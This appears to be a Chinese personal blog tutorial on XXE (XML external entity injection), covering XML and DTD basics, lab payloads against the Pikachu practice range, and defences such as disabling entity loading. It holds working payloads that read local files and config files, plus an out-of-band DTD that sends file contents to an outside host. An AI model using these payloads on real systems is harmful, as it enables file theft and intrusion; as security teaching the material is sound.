
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>XXE - Rounuooo的小站</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="XXE是什么做数据传输
xxe是xml外部实体注入
123简单来说，XXE(XML External Entity Injection)就是XML外部实体注入。当允许引用外部实体时，通过构造恶意内容,"> 
    <meta name="author" content="Rounuooo"> 
    <link rel="alternative" href="atom.xml" title="Rounuooo的小站" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="XXE - Rounuooo的小站"/>
    <meta name="twitter:description" content="XXE是什么做数据传输
xxe是xml外部实体注入
123简单来说，XXE(XML External Entity Injection)就是XML外部实体注入。当允许引用外部实体时，通过构造恶意内容,"/>
    
    
    
    
    <meta property="og:site_name" content="Rounuooo的小站"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="XXE - Rounuooo的小站"/>
    <meta property="og:description" content="XXE是什么做数据传输
xxe是xml外部实体注入
123简单来说，XXE(XML External Entity Injection)就是XML外部实体注入。当允许引用外部实体时，通过构造恶意内容,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

    <script>window.searchDbPath = "/search.xml";</script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Source+Code+Pro&display=swap" rel="stylesheet">
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Rounuooo的小站</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">XXE</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">XXE</h1>
        <div class="stuff">
            <span>十月 13, 2022</span>
            

        </div>
        <div class="content markdown">
            <h4 id="XXE是什么"><a href="#XXE是什么" class="headerlink" title="XXE是什么"></a>XXE是什么</h4><p>做数据传输</p>
<p>xxe是<strong>xml外部实体注入</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">简单来说，XXE(XML External Entity Injection)就是XML外部实体注入。当允许引用外部实体时，通过构造恶意内容，就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。</span><br><span class="line">例如，如果你当前使用的程序为PHP，则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体，从而起到防御的目的。</span><br><span class="line">XXE漏洞触发的点往往是可以上传XML文件的位置，没有对上传的XML文件进行过滤，导致可以上传恶意的XML文件。</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">XML被设计用来传输和存储数据</span><br><span class="line">html被设计用来显示数据</span><br></pre></td></tr></table></figure>

<h5 id="XML基本格式与基本语法"><a href="#XML基本格式与基本语法" class="headerlink" title="XML基本格式与基本语法"></a>XML基本格式与基本语法</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">所有XML元素都必须有关闭标签</span><br><span class="line">XML标签对大小写敏感</span><br><span class="line">XML必须正确地嵌套</span><br><span class="line">XML文档必须有根元素</span><br><span class="line">XML的属性值需加引号</span><br><span class="line">可以将多个字符放入&lt;![CDATA[内容]]&gt;进行转义</span><br></pre></td></tr></table></figure>

<h5 id="DTD"><a href="#DTD" class="headerlink" title="DTD"></a>DTD</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">XML文档有自己的一个格式规范，这个格式规范是由一个叫做DTD(document type definition)的东西控制的。</span><br><span class="line">DTD用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在另外一个单独的文件中(外部引用)。是XML文档中的几条语句,用来说明哪些元素/属性是合法的以及元素间应当怎样嵌套/结合，也用来将一些特殊字符和可复用代码段自定义为实体。</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">DTD（文档类型定义）的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明，也可以外部引用。</span><br><span class="line"></span><br><span class="line">内部声明:</span><br><span class="line">&lt;!DOCTYPE 根元素 [元素声明]&gt;  例: &lt;!DOCTYOE test any&gt;</span><br><span class="line"></span><br><span class="line">外部声明:</span><br><span class="line"> &lt;!DOCTYPE 根元素 SYSTEM &quot;文件名&quot;&gt; 	例:&lt;!DOCTYPE test SYSTEM &#x27;http://www.test.com/evil.dtd&#x27;&gt;</span><br></pre></td></tr></table></figure>

<h5 id="XML预定义五个实体引用"><a href="#XML预定义五个实体引用" class="headerlink" title="XML预定义五个实体引用"></a>XML预定义五个实体引用</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&amp;lt;		&amp;gt;		&amp;amp;		&amp;apos;		&amp;quot;</span><br><span class="line">&lt;			&gt;			&amp;			&#x27;			&quot;</span><br></pre></td></tr></table></figure>

<h5 id="XML实体"><a href="#XML实体" class="headerlink" title="XML实体"></a>XML实体</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">字符实体</span><br><span class="line">命名实体</span><br><span class="line">外部实体</span><br><span class="line">参数实体</span><br><span class="line">内部实体</span><br><span class="line">普通实体和参数实体都分为内部实体和外部实体两种，外部实体定义需要加上SYSTEM关键字，其内容是URL所指向的外部文件实际的内容。如果不加SYSTEM关键字，则为内部实体，表示实体指代内容为字符串。</span><br></pre></td></tr></table></figure>

<h5 id="XML外部实体示例"><a href="#XML外部实体示例" class="headerlink" title="XML外部实体示例"></a>XML外部实体示例</h5><h5 id="无回显时使用"><a href="#无回显时使用" class="headerlink" title="无回显时使用"></a>无回显时使用</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">BP抓包后,修改成POST模式,在后面加上</span><br><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; </span><br><span class="line">&lt;!DOCTYPE creds [  </span><br><span class="line">&lt;!ENTITY goodies SYSTEM &quot;file:///C:/phpStudy/1.txt&quot;&gt; ]&gt; </span><br><span class="line">&lt;creds&gt;&amp;goodies;&lt;/creds&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">文件一:</span><br><span class="line">&lt;!ENTITY % all</span><br><span class="line">        &quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#x27;http://10.0.0.19/?%file;&#x27;&gt;&quot;</span><br><span class="line">        &gt;</span><br><span class="line">        %all;</span><br><span class="line">        </span><br><span class="line">文件二</span><br><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY [</span><br><span class="line"> &lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///c:/Windows/win.ini&quot;&gt;</span><br><span class="line"> &lt;!ENTITY % dtd SYSTEM &quot;http://www.localhost.com/xxe_file.dtd&quot;&gt;</span><br><span class="line">%dtd;</span><br><span class="line">%send;</span><br><span class="line">]&gt;</span><br></pre></td></tr></table></figure>

<p>BP中直接显示明文</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; </span><br><span class="line">&lt;!DOCTYPE creds [  </span><br><span class="line">&lt;!ENTITY goodies SYSTEM &quot;file:///C:/phpStudy/WWW/99.txt&quot;&gt; ]&gt; </span><br><span class="line">&lt;creds&gt;&amp;goodies;&lt;/creds&gt;</span><br><span class="line">将99.txt文件内容显示出来</span><br></pre></td></tr></table></figure>



<h5 id="例题-皮卡丘靶场例题-读config-inc-php文件"><a href="#例题-皮卡丘靶场例题-读config-inc-php文件" class="headerlink" title="例题:皮卡丘靶场例题,读config.inc.php文件"></a>例题:皮卡丘靶场例题,读config.inc.php文件</h5><h5 id="使用php-x2F-x2F-filter-x2F-read来转化"><a href="#使用php-x2F-x2F-filter-x2F-read来转化" class="headerlink" title="使用php:&#x2F;&#x2F;filter&#x2F;read来转化"></a>使用php:&#x2F;&#x2F;filter&#x2F;read来转化</h5><p>有回显(使用base64)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; </span><br><span class="line">&lt;!DOCTYPE creds [  </span><br><span class="line">&lt;!ENTITY goodies SYSTEM  &quot;php://filter/read=convert.base64-encode/resource=file:///C:/phpStudy/WWW/pikachu-master/inc/config.inc.php&quot;&gt; ]&gt; </span><br><span class="line">&lt;creds&gt;&amp;goodies;&lt;/creds&gt;</span><br></pre></td></tr></table></figure>

<h6 id="有回显-明文"><a href="#有回显-明文" class="headerlink" title="有回显(明文)"></a>有回显(明文)</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; </span><br><span class="line">&lt;!DOCTYPE creds [  </span><br><span class="line">&lt;!ENTITY goodies SYSTEM &quot;file:///C:/phpStudy/WWW/pikachu-master/1.txt&quot;&gt; ]&gt; </span><br><span class="line">&lt;creds&gt;&amp;goodies;&lt;/creds&gt;</span><br></pre></td></tr></table></figure>

<h5 id="XXE无回显的利用"><a href="#XXE无回显的利用" class="headerlink" title="XXE无回显的利用"></a>XXE无回显的利用</h5><p>发送给漏洞服务器的包(无回显时也可用)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">POST /vul/xxe/xxe_1.php HTTP/1.1</span><br><span class="line">Host: www.pikachu.com</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 287</span><br><span class="line">Origin: http://www.pikachu.com</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://www.pikachu.com/vul/xxe/xxe_1.php</span><br><span class="line">Cookie: PHPSESSID=38avn1v46f2n43a3qe8hrr5u73</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">xml=&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE ANY [</span><br><span class="line"> &lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///C:/phpStudy/WWW/pikachu-master/inc/config.inc.php&quot;&gt;</span><br><span class="line"> &lt;!ENTITY % dtd SYSTEM &quot;http://www.localhost.com/xxe_file.dtd&quot;&gt;</span><br><span class="line">%dtd;</span><br><span class="line">%send;</span><br><span class="line">]&gt;&amp;submit=%E6%8F%90%E4%BA%A4</span><br></pre></td></tr></table></figure>

<h5 id="如何挖掘XXE"><a href="#如何挖掘XXE" class="headerlink" title="如何挖掘XXE"></a>如何挖掘XXE</h5><p>1.手工测试</p>
<ol>
<li>有回显XXE:<ol>
<li>观察请求头Accept字段是否有application&#x2F;xml, text&#x2F;xml等</li>
<li>提交一个POST请求，请求头加上Content-type:application&#x2F;xml</li>
<li>提交一个简单的xml测试语句，查看打印结果</li>
</ol>
</li>
<li>无回显XXE<ol>
<li>提交测试数据</li>
<li>利用http协议访问攻击主机，然后查看访问日志确定是否存在XXE</li>
<li>或者利用dnslog，地址: <a target="_blank" rel="noopener" href="http://www.dnslog.cnl/">http://www.dnslog.cnl</a></li>
</ol>
</li>
</ol>
<p>2.代码审计</p>
<p>3.工具自动化注入</p>
<h5 id="XXE的防御"><a href="#XXE的防御" class="headerlink" title="XXE的防御"></a>XXE的防御</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">方案一：使用开发语言提供的禁用外部实体的方法</span><br><span class="line">PHP			</span><br><span class="line">libxml_disable_entity_loader(true);</span><br><span class="line"></span><br><span class="line">JAVA		</span><br><span class="line">DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();</span><br><span class="line">dbf.setExpandEntityReferences(false);</span><br><span class="line"></span><br><span class="line">Python:</span><br><span class="line">from lxml import etree</span><br><span class="line">xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))</span><br><span class="line"></span><br><span class="line">方案二：过滤用户提交的XML数据</span><br><span class="line">过滤关键词&lt;!DOCTYPE和&lt;!ENTITY，或者SYSTEM和PUBLIC。</span><br></pre></td></tr></table></figure>




            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
        
    <div id="gitalk-container" class="comment link"
		data-enable="false"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
